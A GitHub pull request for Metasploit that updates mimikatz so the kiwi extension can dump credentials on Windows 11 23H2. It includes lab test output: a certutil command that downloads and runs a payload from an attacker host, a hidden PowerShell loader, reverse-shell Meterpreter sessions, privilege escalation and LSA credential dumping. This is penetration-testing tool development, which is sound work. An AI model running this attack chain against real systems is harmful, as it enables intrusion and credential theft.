Update mimikatz to 45c42c71 #698

Merged
merged 1 commit into from
Feb 20, 2024


zeroSteiner
Contributor

This pulls in changes from rapid7/mimikatz#12 to fix #697.

With these changes in place, credentials can be dumped from Windows 11 23H2.

@b1gy7

b1gy7 commented Feb 13, 2024

Hi, when will this commit get merged? Does someone have an idea? Big thanks & best regards

@cdelafuente-r7
Contributor

Thanks @zeroSteiner. It looks good to me. I tested against Windows 11 23H2 and verified the kiwi extension loads and works as expected. I'll go ahead and land it.

Example output

  • x64 Meterpreter payload
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) >
[*] Started reverse TCP handler on 192.168.120.1:4444

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > generate -f raw
certutil -urlcache -f http://192.168.120.1:8080/Qy-qOX10kZIXJGk3Q336Lg %TEMP%\mikKeNNxEM.exe & start /B %TEMP%\mikKeNNxEM.exe
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used

[*] Sending stage (264774 bytes) to 192.168.120.240
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 1 opened (192.168.120.1:4444 -> 192.168.120.240:49805) at 2024-02-20 18:29:04 +0100

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN11PRO
OS              : Windows 11 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/elevator.x64.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > load kiwi
Loading extension kiwi...WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_kiwi.x64.dll is being used

  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain    NTLM                              SHA1                                      DPAPI
--------  ------    ----                              ----                                      -----
n00tmeg   Win11Pro  <redacted>                        <redacted>                                <redacted>

kerberos credentials
====================

Username   Domain     Password
--------   ------     --------
(null)     (null)     (null)
n00tmeg    Win11Pro   (null)
win11pro$  WORKGROUP  (null)


meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : WIN11PRO
<redacted>

  • x86 Meterpreter payload
msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on 192.168.120.1:4444
msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > generate -f raw
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4)...[SNIP]...
msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] Sending stage (176198 bytes) to 192.168.120.240
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 2 opened (192.168.120.1:4444 -> 192.168.120.240:49916) at 2024-02-20 18:32:24 +0100

msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/elevator.x86.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > sysinfo
Computer        : WIN11PRO
OS              : Windows 11 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > load kiwi
Loading extension kiwi...WARNING: Local file /home/msfuser/dev/src/metasploit-framework/data/meterpreter/ext_server_kiwi.x86.dll is being used

  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : WIN11PRO
<redacted>

@cdelafuente-r7 cdelafuente-r7 merged commit 0ee45fa into rapid7:master Feb 20, 2024
17 checks passed
@cdelafuente-r7
Contributor

Release Notes

This pulls in changes from the mimikatz upstream project to be able to dump credentials from Windows 11 23H2.

zeroSteiner added a commit to zeroSteiner/metasploit-framework that referenced this pull request Feb 20, 2024
errorxyz pushed a commit to errorxyz/metasploit-framework that referenced this pull request Feb 25, 2024